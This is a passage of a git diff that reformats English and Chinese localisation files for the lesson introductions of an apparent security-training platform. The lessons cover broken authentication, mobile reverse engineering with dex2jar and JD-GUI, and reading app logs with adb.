-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
\ No newline at end of file
+title.question.m_poor_authentication = \u4EC0\u4E48\u662F\u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1?
+
+paragraph.info = \u5931\u6548\u7684\u8EAB\u4EFD\u8BA4\u8BC1\u95EE\u9898\u662F\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u4F9D\u8D56\u4E8E\u4E00\u4E2A\u4E0D\u5B89\u5168\u7684\u8BA4\u8BC1\u65B9\u5F0F.\u8FD9\u53EF\u4EE5\u6709\u8BB8\u591A\u4E0D\u540C\u7684\u5F62\u5F0F.\u5176\u4E2D\u4E00\u4E2A\u4F8B\u5B50\u5C31\u662F\u5BC6\u7801\u91CD\u7F6E\u529F\u80FD,\u867D\u7136\u65B9\u4FBF,\u5374\u53EF\u4EE5\u6CC4\u6F0F\u8BA4\u8BC1\u7684\u8FC7\u7A0B.\u5728\u8FD9\u4E2A\u7A0B\u5E8F\u4E2D,\u6211\u4EEC\u4E0D\u9700\u8981\u77E5\u9053\u5BC6\u7801\u4F5C\u4E3A\u91CD\u7F6E\u8FD9\u4E2A\u529F\u80FD\u4E8E\u6211\u4EEC\u662F\u53EF\u7528\u7684.\u5176\u6B21,\u8FD9\u4E2A\u7A0B\u5E8F\u6B63\u5728\u6CC4\u6F0F\u7528\u6237\u5728\u5148\u524D\u4F7F\u7528\u7A0B\u5E8F\u4E2D\u5DF2\u7ECF\u952E\u5165\u7684\u4FE1\u606F\u7684\u65E5\u5FD7.\u8FD9\u4E9B\u4FE1\u606F\u5C06\u63D0\u4F9B\u7ED9\u4F60\u6240\u9700\u8981\u91CD\u7F6E\u5BC6\u7801\u548C\u83B7\u5F97\u94A5\u5319\u7684\u6570\u636E.\u8EAB\u4EFD\u8BA4\u8BC1\u662F\u9A8C\u8BC1\u4E00\u4E2A\u7528\u6237\u8BF4\u4ED6\u662F\u8C01.\u6388\u6743\u662F\u9A8C\u8BC1\u7528\u6237\u5177\u6709\u8BBF\u95EE\u7ED9\u5B9A\u7684\u8D44\u6E90\u7684\u6743\u5229 (\u4F8B\u5982\u7BA1\u7406\u5458\u7279\u6743).
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_reverse_engineering/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9.properties b/src/main/resources/i18n/lessons/m_reverse_engineering/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9.properties
index b5e01fad0..e98313e4c 100644
--- a/src/main/resources/i18n/lessons/m_reverse_engineering/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9.properties
+++ b/src/main/resources/i18n/lessons/m_reverse_engineering/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9.properties
@@ -1,7 +1,10 @@
-title.question.m_reverse_engineering=What is Mobile Reverse Engineering?
-paragraph.info.1=One of the biggest dangers to Mobile Applications is reverse engineering. This is easily done and can reveal source code, API keys, Encryption Keys, Hidden Admin Functionality or hard coded passwords. A developer may obfuscate their code in order to make it more difficult for an attacker to read. In some cases obfuscation is the only defense.
-paragraph.info.2=<a>ProGuard</a> is a tool which now comes with the Android SDK and can be used to optimize, shrink and <a>obfuscate code</a>. Obfuscation makes the code harder to read for anyone who reverse engineers the APK. Although ProGuard is an excellent tool, it will not secure your code.  ProGuard should generally be used all the time due to the other benefits it offers, but it will only slow down an attacker from gathering information and cannot prevent attackers from finding sensitive information.
-paragraph.info.3=Other obfuscation techniques involve not only making the code harder to read but also making the code more confusing. Instead of a hard coded string comparison, an App could use a function to check to validity of a password.
-challenge.description=There are two tools you will need to reverse engineer an APK. <a>Dex2Jar</a> and <a>JD-GUI</a>. Once you have these tools and the target APK, use dex2jar to convert the APK to a jar file then open the .jar file with JD-GUI. Carry this out against the app for this lesson and investigate the source code to retrieve the result key.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
\ No newline at end of file
+title.question.m_reverse_engineering = What is Mobile Reverse Engineering?
+
+paragraph.info.1 = One of the biggest dangers to Mobile Applications is reverse engineering. This is easily done and can reveal source code, API keys, Encryption Keys, Hidden Admin Functionality or hard coded passwords. A developer may obfuscate their code in order to make it more difficult for an attacker to read. In some cases obfuscation is the only defense.
+paragraph.info.2 = <a>ProGuard</a> is a tool which now comes with the Android SDK and can be used to optimize, shrink and <a>obfuscate code</a>. Obfuscation makes the code harder to read for anyone who reverse engineers the APK. Although ProGuard is an excellent tool, it will not secure your code.  ProGuard should generally be used all the time due to the other benefits it offers, but it will only slow down an attacker from gathering information and cannot prevent attackers from finding sensitive information.
+paragraph.info.3 = Other obfuscation techniques involve not only making the code harder to read but also making the code more confusing. Instead of a hard coded string comparison, an App could use a function to check to validity of a password.
+
+challenge.description = There are two tools you will need to reverse engineer an APK. <a>Dex2Jar</a> and <a>JD-GUI</a>. Once you have these tools and the target APK, use dex2jar to convert the APK to a jar file then open the .jar file with JD-GUI. Carry this out against the app for this lesson and investigate the source code to retrieve the result key.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_reverse_engineering/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9_zh.properties b/src/main/resources/i18n/lessons/m_reverse_engineering/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9_zh.properties
index 90a8ab80d..e75fad107 100644
--- a/src/main/resources/i18n/lessons/m_reverse_engineering/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9_zh.properties
+++ b/src/main/resources/i18n/lessons/m_reverse_engineering/19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9_zh.properties
@@ -1,7 +1,10 @@
-title.question.m_reverse_engineering=\u4EC0\u4E48\u662F\u79FB\u52A8\u9006\u5411\u5DE5\u7A0B?
-paragraph.info.1=\u5BF9\u4E8E\u79FB\u52A8\u5E94\u7528\u6700\u5927\u7684\u5371\u9669\u4E4B\u4E00\u5C31\u662F\u9006\u5411\u5DE5\u7A0B,\u64CD\u4F5C\u7B80\u5355,\u5BB9\u6613\u5B8C\u6210,\u5E76\u53EF\u4EE5\u63ED\u793A\u6E90\u4EE3\u7801,API\u5BC6\u94A5,\u52A0\u5BC6\u5BC6\u5319,\u9690\u85CF\u7BA1\u7406\u5458\u529F\u80FD\u6216\u786C\u7F16\u7801\u53E3\u4EE4.\u5F00\u53D1\u4EBA\u5458\u53EF\u4EE5\u901A\u8FC7\u6DF7\u6DC6\u4EE3\u7801\u6765\u8FBE\u5230\u8BA9\u653B\u51FB\u8005\u66F4\u96BE\u8BFB\u53D6\u4EE3\u7801\u7684\u76EE\u7684.\u540C\u65F6,\u5728\u4E00\u4E9B\u60C5\u51B5\u4E0B,\u6DF7\u6DC6\u4EE3\u7801\u5C31\u662F\u552F\u4E00\u7684\u9632\u7EBF.
-paragraph.info.2=ProGuard\u662F\u4E00\u9879\u7531Android SDK\u81EA\u5E26\u7684,\u53EF\u7528\u4E8E\u4F18\u5316,\u7F29\u5C0F\u548C\u6DF7\u6DC6\u4EE3\u7801\u7684\u5DE5\u5177.\u6DF7\u6DC6\u53EF\u4EE5\u589E\u52A0\u9006\u5411\u5DE5\u7A0B\u8BE5APK\u7684\u4EBA\u8BFB\u53D6\u4EE3\u7801\u7684\u96BE\u5EA6.\u5C3D\u7BA1ProGuard\u662F\u4E00\u4E2A\u975E\u5E38\u597D\u7684\u5DE5\u5177,\u4F46\u5B83\u5E76\u4E0D\u80FD\u4FDD\u8BC1\u4F60\u7684\u4EE3\u7801\u7684\u5B89\u5168.ProGuard\u5E94\u8BE5\u88AB\u4E00\u76F4\u4F7F\u7528,\u57FA\u4E8E\u5B83\u5176\u5B83\u7684\u597D\u5904,\u4F46\u4E5F\u53EA\u80FD\u51CF\u7F13\u653B\u51FB\u8005\u6536\u96C6\u4FE1\u606F\u7684\u901F\u5EA6,\u5E76\u4E0D\u80FD\u7EC8\u6B62\u653B\u51FB\u8005\u627E\u5230\u654F\u611F\u4FE1\u606F.
-paragraph.info.3=\u5176\u4ED6\u6DF7\u6DC6\u6280\u672F\u5305\u542B\u4E0D\u4EC5\u4F7F\u4EE3\u7801\u66F4\u96BE\u88AB\u8BFB\u53D6,\u4E5F\u8BA9\u4EE3\u7801\u66F4\u52A0\u6DF7\u4E71.\u4E0E\u5176\u4F7F\u7528\u786C\u7F16\u7801\u5B57\u7B26\u4E32\u6BD4\u8F83,\u5E94\u7528\u7A0B\u5E8F\u4E0D\u5982\u4F7F\u7528\u4E00\u4E2A\u51FD\u6570\u68C0\u67E5\u5BC6\u7801\u7684\u6709\u6548\u6027.
-challenge.description=<a>Dex2Jar</a> \u548C <a>JD-GUI</a>\u662F\u4E24\u4E2A\u4F60\u5C06\u9700\u8981\u7528\u4E8E\u9006\u5411\u5DE5\u7A0B\u7684APK\u7684\u5DE5\u5177.\u4E00\u65E6\u4F60\u6709\u8FD9\u4E9B\u5DE5\u5177\u548C\u76EE\u6807APK,\u4F7F\u7528dex2jar\u5C06APK\u8F6C\u6362\u5230jar\u6587\u4EF6,\u7136\u540E\u7528JD-GUI\u6253\u5F00.jar\u6587\u4EF6.\u5BF9\u8BE5\u8BFE\u7A0B\u4F7F\u7528\u6B64\u65B9\u6CD5\u5E76\u8C03\u67E5\u6E90\u4EE3\u7801\u83B7\u53D6\u7ED3\u679C\u7684\u94A5\u5319.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+title.question.m_reverse_engineering = \u4EC0\u4E48\u662F\u79FB\u52A8\u9006\u5411\u5DE5\u7A0B?
+
+paragraph.info.1 = \u5BF9\u4E8E\u79FB\u52A8\u5E94\u7528\u6700\u5927\u7684\u5371\u9669\u4E4B\u4E00\u5C31\u662F\u9006\u5411\u5DE5\u7A0B,\u64CD\u4F5C\u7B80\u5355,\u5BB9\u6613\u5B8C\u6210,\u5E76\u53EF\u4EE5\u63ED\u793A\u6E90\u4EE3\u7801,API\u5BC6\u94A5,\u52A0\u5BC6\u5BC6\u5319,\u9690\u85CF\u7BA1\u7406\u5458\u529F\u80FD\u6216\u786C\u7F16\u7801\u53E3\u4EE4.\u5F00\u53D1\u4EBA\u5458\u53EF\u4EE5\u901A\u8FC7\u6DF7\u6DC6\u4EE3\u7801\u6765\u8FBE\u5230\u8BA9\u653B\u51FB\u8005\u66F4\u96BE\u8BFB\u53D6\u4EE3\u7801\u7684\u76EE\u7684.\u540C\u65F6,\u5728\u4E00\u4E9B\u60C5\u51B5\u4E0B,\u6DF7\u6DC6\u4EE3\u7801\u5C31\u662F\u552F\u4E00\u7684\u9632\u7EBF.
+paragraph.info.2 = ProGuard\u662F\u4E00\u9879\u7531Android SDK\u81EA\u5E26\u7684,\u53EF\u7528\u4E8E\u4F18\u5316,\u7F29\u5C0F\u548C\u6DF7\u6DC6\u4EE3\u7801\u7684\u5DE5\u5177.\u6DF7\u6DC6\u53EF\u4EE5\u589E\u52A0\u9006\u5411\u5DE5\u7A0B\u8BE5APK\u7684\u4EBA\u8BFB\u53D6\u4EE3\u7801\u7684\u96BE\u5EA6.\u5C3D\u7BA1ProGuard\u662F\u4E00\u4E2A\u975E\u5E38\u597D\u7684\u5DE5\u5177,\u4F46\u5B83\u5E76\u4E0D\u80FD\u4FDD\u8BC1\u4F60\u7684\u4EE3\u7801\u7684\u5B89\u5168.ProGuard\u5E94\u8BE5\u88AB\u4E00\u76F4\u4F7F\u7528,\u57FA\u4E8E\u5B83\u5176\u5B83\u7684\u597D\u5904,\u4F46\u4E5F\u53EA\u80FD\u51CF\u7F13\u653B\u51FB\u8005\u6536\u96C6\u4FE1\u606F\u7684\u901F\u5EA6,\u5E76\u4E0D\u80FD\u7EC8\u6B62\u653B\u51FB\u8005\u627E\u5230\u654F\u611F\u4FE1\u606F.
+paragraph.info.3 = \u5176\u4ED6\u6DF7\u6DC6\u6280\u672F\u5305\u542B\u4E0D\u4EC5\u4F7F\u4EE3\u7801\u66F4\u96BE\u88AB\u8BFB\u53D6,\u4E5F\u8BA9\u4EE3\u7801\u66F4\u52A0\u6DF7\u4E71.\u4E0E\u5176\u4F7F\u7528\u786C\u7F16\u7801\u5B57\u7B26\u4E32\u6BD4\u8F83,\u5E94\u7528\u7A0B\u5E8F\u4E0D\u5982\u4F7F\u7528\u4E00\u4E2A\u51FD\u6570\u68C0\u67E5\u5BC6\u7801\u7684\u6709\u6548\u6027.
+
+challenge.description = <a>Dex2Jar</a> \u548C <a>JD-GUI</a>\u662F\u4E24\u4E2A\u4F60\u5C06\u9700\u8981\u7528\u4E8E\u9006\u5411\u5DE5\u7A0B\u7684APK\u7684\u5DE5\u5177.\u4E00\u65E6\u4F60\u6709\u8FD9\u4E9B\u5DE5\u5177\u548C\u76EE\u6807APK,\u4F7F\u7528dex2jar\u5C06APK\u8F6C\u6362\u5230jar\u6587\u4EF6,\u7136\u540E\u7528JD-GUI\u6253\u5F00.jar\u6587\u4EF6.\u5BF9\u8BE5\u8BFE\u7A0B\u4F7F\u7528\u6B64\u65B9\u6CD5\u5E76\u8C03\u67E5\u6E90\u4EE3\u7801\u83B7\u53D6\u7ED3\u679C\u7684\u94A5\u5319.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
diff --git a/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec.properties b/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec.properties
index 6e698c060..b353d36b8 100644
--- a/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec.properties
+++ b/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec.properties
@@ -1,15 +1,18 @@
-title.question.m_uninteded_data_leakage=What is Mobile Unintended Data Leakage?
-paragraph.info.1=Unintended data leakage occurs when an App inadvertently places sensitive information or data in a location on the mobile device that is accessible by attackers or other Apps on the device.
-paragraph.list.header=Unintended Data Leakage comes in many forms, including
-paragraph.list.1=URL Caching (Both request and response)
-paragraph.list.2=Keyboard Press Caching
-paragraph.list.3=Copy/Paste buffer Caching
-paragraph.list.4=Application backgrounding
-paragraph.list.5=Logging
-paragraph.list.6=HTML5 data storage
-paragraph.list.7=Browser cookie objects
-paragraph.list.8=Analytic data sent to third parties
-paragraph.info.2=Collecting logs can be done with the <a>Android Debug Bridge</a> Once you know the IP of a mobile device, you can perform the command <a>adb connect</a> followed with <a>adb logcat</a> to see the any Logs the App is generating.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-challenge.description=Apps won't always use a SQLite database to store data. In some cases, logs yield useful information about the App and its users. Use this information to find the result key. In this lesson, the App <a>caches logs</a> on the device. The App itself acts as a notice board or to do list. Everything a user adds to the <a>ListView</a> in the App is logged.
\ No newline at end of file
+title.question.m_uninteded_data_leakage = What is Mobile Unintended Data Leakage?
+
+paragraph.info.1 = Unintended data leakage occurs when an App inadvertently places sensitive information or data in a location on the mobile device that is accessible by attackers or other Apps on the device.
+paragraph.list.header = Unintended Data Leakage comes in many forms, including
+paragraph.list.1 = URL Caching (Both request and response)
+paragraph.list.2 = Keyboard Press Caching
+paragraph.list.3 = Copy/Paste buffer Caching
+paragraph.list.4 = Application backgrounding
+paragraph.list.5 = Logging
+paragraph.list.6 = HTML5 data storage
+paragraph.list.7 = Browser cookie objects
+paragraph.list.8 = Analytic data sent to third parties
+paragraph.info.2 = Collecting logs can be done with the <a>Android Debug Bridge</a> Once you know the IP of a mobile device, you can perform the command <a>adb connect</a> followed with <a>adb logcat</a> to see the any Logs the App is generating.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+
+challenge.description = Apps won't always use a SQLite database to store data. In some cases, logs yield useful information about the App and its users. Use this information to find the result key. In this lesson, the App <a>caches logs</a> on the device. The App itself acts as a notice board or to do list. Everything a user adds to the <a>ListView</a> in the App is logged.
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec_.properties b/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec_.properties
index 3a88cca2f..cf23f10aa 100644
--- a/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec_.properties
+++ b/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec_.properties
@@ -1,16 +1,19 @@
-title.question.m_uninteded_data_leakage=\u4EC0\u4E48\u662F\u79FB\u52A8\u6570\u636E\u610F\u5916\u6CC4\u6F0F?
-paragraph.info.1=\u610F\u5916\u7684\u6570\u636E\u6CC4\u6F0F\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u4E0D\u7ECF\u610F\u5730\u5C06\u654F\u611F\u4FE1\u606F\u6216\u6570\u636E\u653E\u7F6E\u5728\u4E00\u4E2A\u53EF\u88AB\u653B\u51FB\u8005\u6216\u5176\u4ED6\u5E94\u7528\u8BBF\u95EE\u7684\u79FB\u52A8\u8BBE\u5907.
-paragraph.list.header=\u610F\u5916\u7684\u6570\u636E\u6CC4\u6F0F\u53D1\u751F\u5728\u5F88\u591A\u4E0D\u540C\u7684\u5F62\u5F0F,\u5305\u62EC
-paragraph.list.1=URL \u7F13\u5B58 (Both request and response)
-paragraph.list.2=\u6309\u952E\u76D8\u7F13\u5B58
-paragraph.list.3=\u590D\u5236/\u7C98\u8D34\u7F13\u51B2\u533A\u9AD8\u901F\u7F13\u5B58
-paragraph.list.4=\u5E94\u7528\u7A0B\u5E8F\u540E\u53F0
-paragraph.list.5=\u767B\u5F55
-paragraph.list.6=HTML5 \u6570\u636E\u5B58\u50A8
-paragraph.list.7=\u6D4F\u89C8\u5668 cookie \u5BF9\u8C61
-paragraph.list.8=\u5206\u6790\u6570\u636E\u53D1\u9001\u5230\u7B2C\u4E09\u65B9
-paragraph.info.2=\u6536\u96C6\u65E5\u5FD7\u53EF\u4EE5\u901A\u8FC7<a>Android\u8C03\u8BD5\u6865</a>\u6765\u5B8C\u6210,\u4E00\u65E6\u4F60\u77E5\u9053\u4E00\u4E2A\u79FB\u52A8\u8BBE\u5907\u7684IP,\u4F60\u5C31\u53EF\u4EE5\u6267\u884C\u547D\u4EE4<a>adb\u8FDE\u63A5</a>,\u63A5\u7740<a>adb logcat</a>\u53BB\u770B\u5E94\u7528\u4E2D\u751F\u6210\u7684\u4EFB\u4F55\u65E5\u5FD7.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-challenge.description=\u5E94\u7528\u7A0B\u5E8F\u4E0D\u4F1A\u603B\u662F\u4F7F\u7528SQLite\u6570\u636E\u5E93\u6765\u50A8\u5B58\u6570\u636E.\u5728\u67D0\u4E9B\u60C5\u51B5\u4E0B,\u65E5\u5FD7\u4EA7\u751F\u6709\u7528\u7684\u5173\u4E8E\u8BE5\u5E94\u7528\u548C\u5B83\u7684\u7528\u6237\u7684\u4FE1\u606F.\u4F7F\u7528\u8FD9\u4E9B\u4FE1\u606F\u627E\u5230\u7ED3\u679C\u7684\u94A5\u5319.\u5728\u8BE5\u8BFE\u4E2D,\u5E94\u7528\u7684<a>\u7F13\u5B58\u65E5\u5FD7</a>\u5728\u8BBE\u5907\u4E0A.\u8FD9\u4E2A\u5E94\u7528\u672C\u8EAB\u4F5C\u4E3A\u4E00\u4E2A\u544A\u793A\u677F\u6216\u5F85\u529E\u4E8B\u9879\u6E05\u5355.\u7528\u6237\u6DFB\u52A0\u5230App\u7684<A>ListView</a>\u7684\u4E00\u5207\u90FD\u5DF2\u7ECF\u88AB\u8BB0\u5F55\u4E0B\u6765.
+title.question.m_uninteded_data_leakage = \u4EC0\u4E48\u662F\u79FB\u52A8\u6570\u636E\u610F\u5916\u6CC4\u6F0F?
+
+paragraph.info.1 = \u610F\u5916\u7684\u6570\u636E\u6CC4\u6F0F\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u4E0D\u7ECF\u610F\u5730\u5C06\u654F\u611F\u4FE1\u606F\u6216\u6570\u636E\u653E\u7F6E\u5728\u4E00\u4E2A\u53EF\u88AB\u653B\u51FB\u8005\u6216\u5176\u4ED6\u5E94\u7528\u8BBF\u95EE\u7684\u79FB\u52A8\u8BBE\u5907.
+paragraph.list.header = \u610F\u5916\u7684\u6570\u636E\u6CC4\u6F0F\u53D1\u751F\u5728\u5F88\u591A\u4E0D\u540C\u7684\u5F62\u5F0F,\u5305\u62EC
+paragraph.list.1 = URL \u7F13\u5B58 (Both request and response)
+paragraph.list.2 = \u6309\u952E\u76D8\u7F13\u5B58
+paragraph.list.3 = \u590D\u5236/\u7C98\u8D34\u7F13\u51B2\u533A\u9AD8\u901F\u7F13\u5B58
+paragraph.list.4 = \u5E94\u7528\u7A0B\u5E8F\u540E\u53F0
+paragraph.list.5 = \u767B\u5F55
+paragraph.list.6 = HTML5 \u6570\u636E\u5B58\u50A8
+paragraph.list.7 = \u6D4F\u89C8\u5668 cookie \u5BF9\u8C61
+paragraph.list.8 = \u5206\u6790\u6570\u636E\u53D1\u9001\u5230\u7B2C\u4E09\u65B9
+paragraph.info.2 = \u6536\u96C6\u65E5\u5FD7\u53EF\u4EE5\u901A\u8FC7<a>Android\u8C03\u8BD5\u6865</a>\u6765\u5B8C\u6210,\u4E00\u65E6\u4F60\u77E5\u9053\u4E00\u4E2A\u79FB\u52A8\u8BBE\u5907\u7684IP,\u4F60\u5C31\u53EF\u4EE5\u6267\u884C\u547D\u4EE4<a>adb\u8FDE\u63A5</a>,\u63A5\u7740<a>adb logcat</a>\u53BB\u770B\u5E94\u7528\u4E2D\u751F\u6210\u7684\u4EFB\u4F55\u65E5\u5FD7.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+challenge.description = \u5E94\u7528\u7A0B\u5E8F\u4E0D\u4F1A\u603B\u662F\u4F7F\u7528SQLite\u6570\u636E\u5E93\u6765\u50A8\u5B58\u6570\u636E.\u5728\u67D0\u4E9B\u60C5\u51B5\u4E0B,\u65E5\u5FD7\u4EA7\u751F\u6709\u7528\u7684\u5173\u4E8E\u8BE5\u5E94\u7528\u548C\u5B83\u7684\u7528\u6237\u7684\u4FE1\u606F.\u4F7F\u7528\u8FD9\u4E9B\u4FE1\u606F\u627E\u5230\u7ED3\u679C\u7684\u94A5\u5319.\u5728\u8BE5\u8BFE\u4E2D,\u5E94\u7528\u7684<a>\u7F13\u5B58\u65E5\u5FD7</a>\u5728\u8BBE\u5907\u4E0A.\u8FD9\u4E2A\u5E94\u7528\u672C\u8EAB\u4F5C\u4E3A\u4E00\u4E2A\u544A\u793A\u677F\u6216\u5F85\u529E\u4E8B\u9879\u6E05\u5355.\u7528\u6237\u6DFB\u52A0\u5230App\u7684<A>ListView</a>\u7684\u4E00\u5207\u90FD\u5DF2\u7ECF\u88AB\u8BB0\u5F55\u4E0B\u6765.
 
diff --git a/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec_zh.properties b/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec_zh.properties
index 3a88cca2f..cf23f10aa 100644
--- a/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec_zh.properties
+++ b/src/main/resources/i18n/lessons/m_unintended_data_leakage/392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec_zh.properties
@@ -1,16 +1,19 @@
-title.question.m_uninteded_data_leakage=\u4EC0\u4E48\u662F\u79FB\u52A8\u6570\u636E\u610F\u5916\u6CC4\u6F0F?
-paragraph.info.1=\u610F\u5916\u7684\u6570\u636E\u6CC4\u6F0F\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u4E0D\u7ECF\u610F\u5730\u5C06\u654F\u611F\u4FE1\u606F\u6216\u6570\u636E\u653E\u7F6E\u5728\u4E00\u4E2A\u53EF\u88AB\u653B\u51FB\u8005\u6216\u5176\u4ED6\u5E94\u7528\u8BBF\u95EE\u7684\u79FB\u52A8\u8BBE\u5907.
-paragraph.list.header=\u610F\u5916\u7684\u6570\u636E\u6CC4\u6F0F\u53D1\u751F\u5728\u5F88\u591A\u4E0D\u540C\u7684\u5F62\u5F0F,\u5305\u62EC
-paragraph.list.1=URL \u7F13\u5B58 (Both request and response)
-paragraph.list.2=\u6309\u952E\u76D8\u7F13\u5B58
-paragraph.list.3=\u590D\u5236/\u7C98\u8D34\u7F13\u51B2\u533A\u9AD8\u901F\u7F13\u5B58
-paragraph.list.4=\u5E94\u7528\u7A0B\u5E8F\u540E\u53F0
-paragraph.list.5=\u767B\u5F55
-paragraph.list.6=HTML5 \u6570\u636E\u5B58\u50A8
-paragraph.list.7=\u6D4F\u89C8\u5668 cookie \u5BF9\u8C61
-paragraph.list.8=\u5206\u6790\u6570\u636E\u53D1\u9001\u5230\u7B2C\u4E09\u65B9
-paragraph.info.2=\u6536\u96C6\u65E5\u5FD7\u53EF\u4EE5\u901A\u8FC7<a>Android\u8C03\u8BD5\u6865</a>\u6765\u5B8C\u6210,\u4E00\u65E6\u4F60\u77E5\u9053\u4E00\u4E2A\u79FB\u52A8\u8BBE\u5907\u7684IP,\u4F60\u5C31\u53EF\u4EE5\u6267\u884C\u547D\u4EE4<a>adb\u8FDE\u63A5</a>,\u63A5\u7740<a>adb logcat</a>\u53BB\u770B\u5E94\u7528\u4E2D\u751F\u6210\u7684\u4EFB\u4F55\u65E5\u5FD7.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-challenge.description=\u5E94\u7528\u7A0B\u5E8F\u4E0D\u4F1A\u603B\u662F\u4F7F\u7528SQLite\u6570\u636E\u5E93\u6765\u50A8\u5B58\u6570\u636E.\u5728\u67D0\u4E9B\u60C5\u51B5\u4E0B,\u65E5\u5FD7\u4EA7\u751F\u6709\u7528\u7684\u5173\u4E8E\u8BE5\u5E94\u7528\u548C\u5B83\u7684\u7528\u6237\u7684\u4FE1\u606F.\u4F7F\u7528\u8FD9\u4E9B\u4FE1\u606F\u627E\u5230\u7ED3\u679C\u7684\u94A5\u5319.\u5728\u8BE5\u8BFE\u4E2D,\u5E94\u7528\u7684<a>\u7F13\u5B58\u65E5\u5FD7</a>\u5728\u8BBE\u5907\u4E0A.\u8FD9\u4E2A\u5E94\u7528\u672C\u8EAB\u4F5C\u4E3A\u4E00\u4E2A\u544A\u793A\u677F\u6216\u5F85\u529E\u4E8B\u9879\u6E05\u5355.\u7528\u6237\u6DFB\u52A0\u5230App\u7684<A>ListView</a>\u7684\u4E00\u5207\u90FD\u5DF2\u7ECF\u88AB\u8BB0\u5F55\u4E0B\u6765.
+title.question.m_uninteded_data_leakage = \u4EC0\u4E48\u662F\u79FB\u52A8\u6570\u636E\u610F\u5916\u6CC4\u6F0F?
+
+paragraph.info.1 = \u610F\u5916\u7684\u6570\u636E\u6CC4\u6F0F\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u4E0D\u7ECF\u610F\u5730\u5C06\u654F\u611F\u4FE1\u606F\u6216\u6570\u636E\u653E\u7F6E\u5728\u4E00\u4E2A\u53EF\u88AB\u653B\u51FB\u8005\u6216\u5176\u4ED6\u5E94\u7528\u8BBF\u95EE\u7684\u79FB\u52A8\u8BBE\u5907.
+paragraph.list.header = \u610F\u5916\u7684\u6570\u636E\u6CC4\u6F0F\u53D1\u751F\u5728\u5F88\u591A\u4E0D\u540C\u7684\u5F62\u5F0F,\u5305\u62EC
+paragraph.list.1 = URL \u7F13\u5B58 (Both request and response)
+paragraph.list.2 = \u6309\u952E\u76D8\u7F13\u5B58
+paragraph.list.3 = \u590D\u5236/\u7C98\u8D34\u7F13\u51B2\u533A\u9AD8\u901F\u7F13\u5B58
+paragraph.list.4 = \u5E94\u7528\u7A0B\u5E8F\u540E\u53F0
+paragraph.list.5 = \u767B\u5F55
+paragraph.list.6 = HTML5 \u6570\u636E\u5B58\u50A8
+paragraph.list.7 = \u6D4F\u89C8\u5668 cookie \u5BF9\u8C61
+paragraph.list.8 = \u5206\u6790\u6570\u636E\u53D1\u9001\u5230\u7B2C\u4E09\u65B9
